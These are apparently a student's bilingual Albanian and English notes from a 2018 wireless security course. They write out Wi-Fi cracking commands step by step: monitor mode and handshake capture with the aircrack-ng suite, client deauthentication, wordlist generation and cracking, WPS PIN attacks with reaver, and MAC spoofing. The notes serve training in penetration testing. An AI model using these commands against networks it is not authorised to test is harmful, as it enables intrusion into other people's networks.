########################################################################################## 23.07.2018, module-5 Day 1 https://www.youtube.com/watch?v=7HTfUUzdmEk 802.11a,b,g,n ranges for a b g n ssid: ap name bssid: MAC address of the wireless access point Aircrack-ng toolkit airmon-ng --na mundeson int me qit ne monitor mode airdump-ng --me pa krejt AP e te dhenat e tyre i run me ni file airplay-ng --i disconnect edhe i detyron mu ri connect qe mi nxon handshake aircrack-ng --me crackirat passwin airmon-ng airmon-ng check kill airmon-ng start wlan0 airodump-ng wlan0mon airodum-ng --channel 6 --write capFiles --bssid interfce name aireplay-ng -9 wlan0mon crunch 5 5 0123456789 > filelist.txt --me gjeneru worldlista aircrack-ng -b bssid mac -w worldlist.txt CybHack-01.cap ifconfig | grep flags | cut -d " " -f 1 | tr -d ":" ifconfig | grep "init\b" | cut -d " " -f 10 =====Arbeni cracking wep Grep interface ip's: ifconfig | grep "inet\b" | cut -d " " -f 10 Grep specific interface ip: ifconfig eth0 | grep "inet\b" | cut -d " " -f 10 or ifconfig eth0 | grep "inet\b" | awk '{print $2}' Grep interface name: ifconfig | grep flags | cut -d " " -f 1 | tr -d ":" --------------------------------------------------------- 1) airmon-ng check kill - (to kill processes that are in conflict with aircrack-ng suite) airmon-ng - (to see which interfaces are available) airmon-ng start wlan0 - (to start wlan0 in monitoring mode) 2) airodump-ng wlan0mon - (to see AP's and their prefrences) airodump-ng --bssid --channel --write wlan0mon ..wait for enough beacons 3) aircrack-ng -b CapturedFiles-01.cap Cracked! 5) airmon-ng stop wlan0mon 6) service network-manager restart ########################################################################################## 25.07.2018, module-5 Day 2 beacons --frames qe permbajn network informations ifconfig eth0 iwconfig $/proc/sys/net/ipv4# cat icmp_echo_ignore_all /etc/sysctl.conf net.ipv4.icmp_echo_ignore_all = 1 # sysctl -p --restart #cat /proc/sys/net/ipv4/icmp_echo_ignore_all --to confirm iwlist wlan0 scanning --active scanning airdump-ng --pactive scanning auth mode: open wep --limited password length wpa1, 2, 3 tx rx error --error on packets dropped --kur ka buffer overflow carrier --sa her eshte humb sinjali, zakonisht kabell problem collisios -- ne hub enviroment csma/cd csma/ca full duplex - lan half duplex - toki woki simplex -- tv wireless works - full duplex airodump-ng wlan0mon --clients connected macchanger etho -r --rendom mac change macchanger etho -m xx:xx:xx:xx:xx:xx eth0 initiate de auth packets to deactivate clients than essid will be shown when clients start to connect ----------------------------------- airmon-ng check kill airmon-ng airmon-ng start wan0 ifconfig -- del eminr e bon wlan0mon airodump-ng wlan0mon airmon-ng --bssid xx:xxx:xx:xx --channel 11 --write wifisecurity.txt wlan0mon airodump-ng wlan0mon aireplay-ng --deauth 1 -c xx:Xxx:xx:xx -a cc:cc:cc::c:;c:;c wlan0mon aircrack-ng -w /worldlist path.txt capture file.cap .########################################################################################## 27.07.2018, module-5 Day 3 munges .########################################################################################## 30.07.2018, module-5 Day 4 munges .########################################################################################## 01.08.2018, module-5 Day 5 munges .########################################################################################## 03.08.2018, module-5 Day 6 munges .########################################################################################## 06.08.2018, module-5 Day 7 pushim .########################################################################################## 08.08.2018, module-5 Day 8 pushim .########################################################################################## 10.08.2018, module-5 Day 9 pushim .########################################################################################## 13.08.2018, module-5 Day 10 -crack an AP -worldlist me passworda te wifi head -n 10 ipko.txt | cut -c 1,3,9 .########################################################################################## 15.08.2018, module-5 Day 11 monitoring interfaces layered security imortant for wireless security ########################################################################################## 17.08.2018, module-5 Day 12 Target 2.96 iceberg version ########################################################################################## 20.08.2018, module-5 Day 13 munges wps wash --ignore-fcs -i "interface" reaver -i "interface" -b "BSSID" -vv reaver -i "interface" -b "BSSID" -vv -p "PIN" ########################################################################################## 22.08.2018, module-5 Day 14 pined based attack reaver